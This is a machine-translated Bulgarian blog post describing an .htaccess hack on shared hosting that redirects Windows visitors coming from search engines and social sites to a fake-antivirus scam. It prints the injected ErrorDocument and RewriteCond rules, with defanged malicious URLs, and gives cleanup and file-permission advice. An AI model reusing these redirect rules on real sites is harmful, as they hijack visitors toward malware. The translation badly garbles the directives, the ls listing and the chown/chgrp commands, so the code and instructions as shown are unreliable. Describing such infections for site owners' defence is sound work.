Malware / Virus -. Htaccess "пренапише" и пренасочване

Нова форма на вируса което аз не виждам, че много, засягат сайтове, хоствани на ненадеждни сървъри където потребителите сметки / подсметки могат да "виждат" помежду си. Конкретно, хостинг сметки са поставени в папка "vhosts"Писането и правото на потребителя папка на "vhosts" е дадена обща употреба ... Reseller в повечето ситуации. Той е типичен уеб сървъри, които не използват WHM / Cpanel.

Действието .htaccess - .htaccess Hack

Вирус засегне файлове . Htaccess Сайт на жертвата. Добавих линии / Директива към пренасочите посетителите (Очаквайте от Yahoo, MSN, Google, Facebook, yaindex, Twitter, MySpace и др сайтове и портали с голям трафик) към някои сайтове, които предлагат "антивирусен. "Е Лъжливи Antivirus, Което съм написал в увода към .

Това е начина, по който . Htaccess засегнати: (не достъп до URL адреси съдържание в следващите редове)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine На

RewriteCond% {} HTTP_REFERER. * Yandex. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Vkontakte. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Rambler. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Tube. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Wikipedia. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Blogger. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Baidu. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Qq.com. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Myspace. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Twitter. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Facebook. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Google. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Live. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Aol. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Bing. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Msn. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Amazon. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Ebay. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * LinkedIn. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Flickr. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * LiveJasmin. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Soso. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * DoubleClick. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Pornhub. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Orkut. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * LiveJournal. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Wordpress. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Yahoo. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Ask. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Excite. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * AltaVista. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Msn. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Netscape. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * HotBot. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Goto. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Infoseek. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Mamma. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Alltheweb. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Lycos. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Search. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * MetaCrawler. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Mail. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond% {} * REQUEST_FILENAME Jpg $ |!.. * Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * [R, L]

Тези, които използват WordPress ще намерите тези редове във файла . Htaccess от public_html. В допълнение, вирусът създава. Идентичен Htaccess в папка WP-съдържание.

*Има и ситуации, в които вместо случва peoriavascularsurgery.com dns.thesoulfoodcafe.com или други адреси.

Това, което прави този вирус.

След пренасочени, посетителят е посрещнат с отворени обятия от съобщение:

Внимание!
Компютърът ви съдържа различни признаци на вируси и зловреден софтуер програми присъствие. Вие незабавно изисква анти вирус система проверите!
System Security ще извърши бързо и безплатно сканиране на компютъра за вируси и зловредни програми.

1 зловреден софтуер

Без значение кой бутон е натиснат, ние се отведе на страницата "My Computer"Създаден да имитира дизайн XP. Това автоматично стартира "сканиране", в края на които ние откриваме, че "заразени".

2 зловреден софтуер

След като щракнете върху OK или Отказ, той ще започне ИзтеглиФайла setup.exe. Този setup.exe е фалшив анти вирус засяга система. Можете да инсталирате някои зловреден софтуер да се разпространяват по-нататък връзки вирус, а освен това е антивирусен софтуер (всички неверни), които жертвата е поканена да купи.
Тези, които вече са в контакт с вируса могат да използват тази форма . Препоръчва се също така да сканирате целия HDD. Препоръчвам Kaspersky Internet Security или Kaspersky Anti Virus.

Този вид вирус засяга Гост OS операционни системи Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Засега няма известни случаи на инфекция на операционните системи Windows Вижте да Windows 7.

Как можем да се премахне този вирус. Htaccess файл на сървъра, и как да се предотврати инфекция.

1. Анализ на подозрителни файлове и изтриване на кодове. За да се гарантира, че файлът не е само засегнати . Htaccess е по-добре анализира всички файлове . Php si . Js.

2. Пренаписване файл. Htaccess и задам коригират 644 или 744 с достъп за писане само ръководство на собственика.

3. Когато създавате хостинг акаунт за уеб сайт в папка / Home или / Webroot Това автоматично ще създаде папка, която често има име на потребителя (ръководство за Cpanel, FTPИ др.) За да се предотврати запис на данни и предаване на вируси от един потребител на друг, се препоръчва, че всеки потребител папка, за да се определят:

коригират или 644 744, 755 - показано е 644.
Чоун-R nume_user nume_folder.
chgrp-R nume_user nume_folder

LS-всички начини да се провери дали те са направени правилно. Трябва да се появи нещо като това:

drwx-х-х Dynamics Dynamics 12 4096 май 6 14: 51 Dynamics /
drwx-х-х 10 Дюран Дюран март 4096 7 07: 46 Duran /
drwx-Х-Х Jan 12 4096 29 11 тръби епруветки: тръби 23 /
drwxr-xr-x 14 Express 4096 февруари 26 2009 експресен /
drwxr-XR-х Ezo Ezo 9 4096 май 19 01: 09 Ezo /
drwx-x-x 9 стопанство 4096 ферма 19 22: 29 ферма /

Ако един от по-горе ще бъде userele FTP Заразените файловеТой не може да изпрати на вируса на друг потребител гостоприемник. Това е минималният мрежа за сигурност за защита на сметките хоства на уеб сървър.

Общи елементи на районите, засегнати от този тип на вируса.

Всички засегнати области пренасочите посетителите на сайтове, като името на домейна, съдържащи "/".

Тази "вирус. Htaccess"Засяга всякакъв вид CMS (Joomla, WordPress, PhpBBИ т.н.), която използва . Htaccess.

. Htaccess Пренасочване Virus Hack &.

Malware / Virus -. Htaccess "пренапише" и пренасочване

За автора

Stealth LP

Основател и редактор Stealth НастройкиВ 2006 дата.
Опит с Linux операционни системи (особено CentOS), Mac OS X, Windows XP> Windows 10 и WordPress (CMS).

Оставете коментар